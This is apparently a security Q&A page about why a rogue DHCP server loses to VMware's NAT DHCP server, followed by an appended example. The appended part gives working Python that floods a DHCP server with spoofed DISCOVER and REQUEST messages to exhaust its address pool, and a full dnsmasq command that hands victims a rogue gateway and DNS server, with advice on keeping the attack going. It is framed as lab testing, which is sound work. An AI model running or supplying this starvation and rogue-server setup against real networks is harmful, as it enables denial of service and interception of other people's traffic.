So I've just watched this Defcon video: https://www.youtube.com/watch?v=RaA5dEIqzzQ&t=1583s. Apparently they were able to set up a rogue DHCP server and get a 50/50 chance of sending the victim the DHCP offer before the legitimate DHCP server. However, when I tried this in VMware, my success rate was 0%. The default legitimate DHCP server from the NAT config of VMware always responds to the client before my rogue DHCP server does. This makes me wonder whether it is just the setup of VMware that allows the default DHCP server to respond immediately. If that is the case, how do you get a rogue DHCP server to respond faster in a virtual environment, since there is no concept of "physical distance"?
2 Answers
Short answer is no, you can't.
If your VM network adapter is NAT, your rogue DHCP server is only on the NATed network. To test whether machines on your host's network take an IP from your rogue DHCP server, your VM's network should be bridged.
With your current configuration using NAT on your VM, you are only going to be able to get an IP from your rogue DHCP server on other devices/hosts inside that network that are not VMs created on the same VMware host. This is because VMware is what manages that network, so its own DHCP server is always going to have priority... so you can't get an IP on another VM, even a "NATed" one, created on the same VMware host.
To get an IP from your rogue DHCP VM you must create some kind of special environment. For example:
If you create a VM on your NAT network that already has VMware installed, and inside it you create a VM in bridged network mode... that VM inside the VM can for sure take an IP from your rogue DHCP server with a 50% chance.
I have realized recently that I am still able to carry out the rogue attack by first performing a DHCP starvation attack against the legitimate VMware DHCP server. Then, new clients will start accepting my rogue DHCP responses, as the legitimate one is no longer able to respond due to a lack of free IP addresses. Of course, this only works if my rogue DHCP server is also a VM inside the same NAT network, which I set up with dnsmasq.
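As an added example that is not part of the answer above (and not the answerer's own tool), here is the DHCP message handling behind the starvation step: it builds one DHCPDISCOVER per random client MAC, parses the OFFER that comes back, and answers it with a DHCPREQUEST so a server that only commits a lease on REQUEST still marks the address as taken. The OFFER embedded in the block is a constructed sample standing in for the reply a rogue dnsmasq would send; the 192.168.126.0/24 addresses are assumed lab values, and `send_starvation()` (which needs root to bind UDP port 68) is only meant for a NAT segment you own.

```python
"""
Build and parse the DHCP messages used for a starvation-then-rogue-server test.
Example code written for this page, not the answerer's tool. Assumes a lab
network you own; only send_starvation() touches the network and it needs root.
"""
import os
import random
import socket
import struct
from typing import Optional

DHCP_COOKIE = b"\x63\x82\x53\x63"
DISCOVER, OFFER, REQUEST, ACK = 1, 2, 3, 5   # option 53 values (RFC 2132)


def random_mac() -> bytes:
    """Locally administered (bit 1 set), unicast (bit 0 clear) random MAC.
    Each DISCOVER carries a fresh MAC so the server hands out a fresh lease."""
    first = (random.randrange(256) & 0xFC) | 0x02
    return bytes([first]) + os.urandom(5)


def build_dhcp(msg_type: int, mac: bytes, xid: int, *, op: int = 1,
               yiaddr: str = "0.0.0.0", server_id: Optional[str] = None,
               requested_ip: Optional[str] = None,
               lease: Optional[int] = None) -> bytes:
    """Serialize a minimal RFC 2131 message: 236-byte fixed header, cookie, options."""
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        op, 1, 6, 0, xid, 0, 0x8000,          # op, htype=Ethernet, hlen, hops, xid, secs, flags=BROADCAST
        b"\0" * 4, socket.inet_aton(yiaddr),  # ciaddr, yiaddr
        b"\0" * 4, b"\0" * 4,                 # siaddr, giaddr
        mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    opts = bytes([53, 1, msg_type])
    opts += bytes([61, 7, 1]) + mac           # client identifier: htype + MAC
    if requested_ip:
        opts += bytes([50, 4]) + socket.inet_aton(requested_ip)
    if server_id:
        opts += bytes([54, 4]) + socket.inet_aton(server_id)
    if lease is not None:
        opts += bytes([51, 4]) + struct.pack("!I", lease)
    opts += bytes([55, 3, 1, 3, 6])           # parameter request: mask, router, DNS
    return header + DHCP_COOKIE + opts + b"\xff"


def parse_dhcp(pkt: bytes) -> dict:
    """Extract the fields a starvation/rogue-server test cares about."""
    if len(pkt) < 240 or pkt[236:240] != DHCP_COOKIE:
        raise ValueError("not a DHCP message")
    op, _htype, hlen, _hops, xid = struct.unpack("!BBBBI", pkt[:8])
    opts, i = {}, 240
    while i < len(pkt) and pkt[i] != 255:     # TLV options, 0 is a one-byte pad
        if pkt[i] == 0:
            i += 1
            continue
        length = pkt[i + 1]
        opts[pkt[i]] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    ip = lambda tag: socket.inet_ntoa(opts[tag]) if tag in opts else None
    return {"op": op, "xid": xid, "mac": pkt[28:28 + hlen],
            "yiaddr": socket.inet_ntoa(pkt[16:20]), "msg_type": opts[53][0],
            "server_id": ip(54), "requested_ip": ip(50),
            "lease": struct.unpack("!I", opts[51])[0] if 51 in opts else None}


def starvation_batch(count: int):
    """Return (mac, xid, DISCOVER bytes) for `count` fake clients."""
    batch = []
    for _ in range(count):
        mac, xid = random_mac(), random.getrandbits(32)
        batch.append((mac, xid, build_dhcp(DISCOVER, mac, xid)))
    return batch


def follow_up_request(offer: bytes) -> bytes:
    """Turn an OFFER into the REQUEST that makes the server commit the lease."""
    o = parse_dhcp(offer)
    return build_dhcp(REQUEST, o["mac"], o["xid"],
                      requested_ip=o["yiaddr"], server_id=o["server_id"])


def send_starvation(count: int = 250) -> None:
    """Broadcast DISCOVERs on the lab segment and REQUEST every OFFER (needs root)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.bind(("0.0.0.0", 68))
    s.settimeout(2)
    for _mac, xid, discover in starvation_batch(count):
        s.sendto(discover, ("255.255.255.255", 67))
        try:
            reply, _ = s.recvfrom(1500)
            r = parse_dhcp(reply)
            if r["msg_type"] == OFFER and r["xid"] == xid:
                s.sendto(follow_up_request(reply), ("255.255.255.255", 67))
        except socket.timeout:
            pass  # no OFFER: pool exhausted or server silent, starvation reached


# Constructed sample OFFER (assumed 192.168.126.0/24 lab addresses), the reply a
# rogue dnsmasq at .130 would send for one DISCOVER once the real pool is empty.
SAMPLE_MAC = bytes.fromhex("02aabbccddee")
SAMPLE_OFFER = build_dhcp(OFFER, SAMPLE_MAC, 0x1234ABCD, op=2,
                          yiaddr="192.168.126.50", server_id="192.168.126.130",
                          lease=43200)
```

Once the legitimate pool is empty, the rogue server in the answer is just dnsmasq serving the same segment; with the assumed addresses above that is `dnsmasq --no-daemon --interface=eth0 --dhcp-range=192.168.126.50,192.168.126.200,12h --dhcp-option=3,192.168.126.130 --dhcp-option=6,192.168.126.130`, where options 3 and 6 point the victims' gateway and DNS at the rogue VM. Leases expire, so the starvation loop has to be re-run before the legitimate server's leases come back, or the real server will start winning the race again.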